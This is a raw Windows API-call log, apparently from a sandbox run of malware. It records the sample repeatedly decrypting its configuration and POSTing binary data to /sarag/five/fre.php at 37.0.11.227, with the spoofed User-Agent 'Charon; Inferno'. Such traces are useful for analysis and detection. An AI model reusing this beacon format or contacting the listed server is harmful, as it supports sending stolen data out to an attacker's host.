RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0318.583] socket (af=2, type=1, protocol=6) returned 0xad8 [0318.583] connect (s=0xad8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0318.608] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0318.608] GetProcessHeap () returned 0x690000 [0318.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0318.608] GetProcessHeap () returned 0x690000 [0318.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0318.609] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0318.610] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0318.610] GetProcessHeap () returned 0x690000 [0318.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0318.610] GetProcessHeap () returned 0x690000 [0318.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0318.611] GetProcessHeap () returned 0x690000 [0318.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0318.611] GetProcessHeap () returned 0x690000 [0318.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0318.612] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0318.613] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0318.613] GetProcessHeap () returned 0x690000 [0318.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0318.613] GetProcessHeap () returned 0x690000 [0318.614] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0318.614] send (s=0xad8, buf=0x6ad508*, len=242, flags=0) returned 242 [0318.614] send (s=0xad8, buf=0x6aba40*, len=159, flags=0) returned 159 [0318.614] GetProcessHeap () returned 0x690000 [0318.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0318.614] recv (in: s=0xad8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0318.701] GetProcessHeap () returned 0x690000 [0318.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0318.701] GetProcessHeap () returned 0x690000 [0318.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0318.702] GetProcessHeap () returned 0x690000 [0318.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0318.702] GetProcessHeap () returned 0x690000 [0318.702] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0318.702] closesocket (s=0xad8) returned 0 [0318.703] GetProcessHeap () returned 0x690000 [0318.703] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0318.703] GetProcessHeap () returned 0x690000 [0318.703] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0318.704] GetProcessHeap () returned 0x690000 [0318.704] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0318.704] GetProcessHeap () returned 0x690000 [0318.705] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0318.705] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x181c) returned 0xad8 [0318.706] Sleep (dwMilliseconds=0xea60) [0318.708] GetProcessHeap () returned 0x690000 [0318.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0318.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.709] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.714] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0318.721] GetProcessHeap () returned 0x690000 [0318.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0318.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.722] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0318.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.723] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.724] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.724] GetProcessHeap () returned 0x690000 [0318.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0318.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.725] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0318.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.728] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0318.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.729] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0318.729] GetProcessHeap () returned 0x690000 [0318.729] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0318.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.729] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.730] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.731] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.732] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.732] GetProcessHeap () returned 0x690000 [0318.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0318.732] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.732] GetProcessHeap () returned 0x690000 [0318.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0318.733] GetProcessHeap () returned 0x690000 [0318.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0318.733] GetProcessHeap () returned 0x690000 [0318.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0318.734] GetProcessHeap () returned 0x690000 [0318.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0318.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.734] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.742] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0318.747] GetProcessHeap () returned 0x690000 [0318.748] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0318.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.749] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0318.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.750] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.751] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.751] GetProcessHeap () returned 0x690000 [0318.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0318.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.752] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0318.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.753] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0318.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.754] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0318.754] GetProcessHeap () returned 0x690000 [0318.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0318.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.755] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0318.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.757] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0318.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.757] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0318.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.758] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0318.758] GetProcessHeap () returned 0x690000 [0318.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0318.759] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0318.759] GetProcessHeap () returned 0x690000 [0318.759] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0318.759] socket (af=2, type=1, protocol=6) returned 0xadc [0318.759] connect (s=0xadc, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0318.787] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0318.787] GetProcessHeap () returned 0x690000 [0318.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0318.788] GetProcessHeap () returned 0x690000 [0318.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0318.788] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0318.789] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0318.789] GetProcessHeap () returned 0x690000 [0318.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0318.789] GetProcessHeap () returned 0x690000 [0318.790] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0318.790] GetProcessHeap () returned 0x690000 [0318.790] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0318.790] GetProcessHeap () returned 0x690000 [0318.790] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0318.791] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0318.791] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0318.791] GetProcessHeap () returned 0x690000 [0318.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0318.791] GetProcessHeap () returned 0x690000 [0318.792] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0318.792] send (s=0xadc, buf=0x6ad508*, len=242, flags=0) returned 242 [0318.792] send (s=0xadc, buf=0x6aba40*, len=159, flags=0) returned 159 [0318.793] GetProcessHeap () returned 0x690000 [0318.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0318.793] recv (in: s=0xadc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0318.930] GetProcessHeap () returned 0x690000 [0318.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0318.930] GetProcessHeap () returned 0x690000 [0318.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0318.930] GetProcessHeap () returned 0x690000 [0318.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0318.931] GetProcessHeap () returned 0x690000 [0318.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0318.931] closesocket (s=0xadc) returned 0 [0318.932] GetProcessHeap () returned 0x690000 [0318.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0318.932] GetProcessHeap () returned 0x690000 [0318.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0318.932] GetProcessHeap () returned 0x690000 [0318.933] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0318.933] GetProcessHeap () returned 0x690000 [0318.933] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0318.933] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1820) returned 0xadc [0318.939] Sleep (dwMilliseconds=0xea60) [0318.940] GetProcessHeap () returned 0x690000 [0318.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0318.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.942] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.948] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0318.955] GetProcessHeap () returned 0x690000 [0318.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0318.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.957] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0318.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.959] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.960] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.960] GetProcessHeap () returned 0x690000 [0318.961] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0318.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.977] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0318.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.979] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0318.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.980] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0318.980] GetProcessHeap () returned 0x690000 [0318.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0318.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.981] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.982] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.983] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0318.984] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.984] GetProcessHeap () returned 0x690000 [0318.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0318.985] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.985] GetProcessHeap () returned 0x690000 [0318.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0318.985] GetProcessHeap () returned 0x690000 [0318.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0318.986] GetProcessHeap () returned 0x690000 [0318.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0318.986] GetProcessHeap () returned 0x690000 [0318.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0318.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0318.988] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.002] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0319.013] GetProcessHeap () returned 0x690000 [0319.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0319.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.014] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0319.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.015] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.016] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.016] GetProcessHeap () returned 0x690000 [0319.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0319.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.019] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0319.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.037] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0319.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0319.038] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0319.038] GetProcessHeap () returned 0x690000 [0319.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0319.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.039] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0319.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.040] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0319.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.041] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0319.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0319.042] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0319.042] GetProcessHeap () returned 0x690000 [0319.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0319.042] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0319.042] GetProcessHeap () returned 0x690000 [0319.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0319.042] socket (af=2, type=1, protocol=6) returned 0xae0 [0319.043] connect (s=0xae0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0319.068] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0319.068] GetProcessHeap () returned 0x690000 [0319.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0319.068] GetProcessHeap () returned 0x690000 [0319.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0319.068] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0319.069] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: 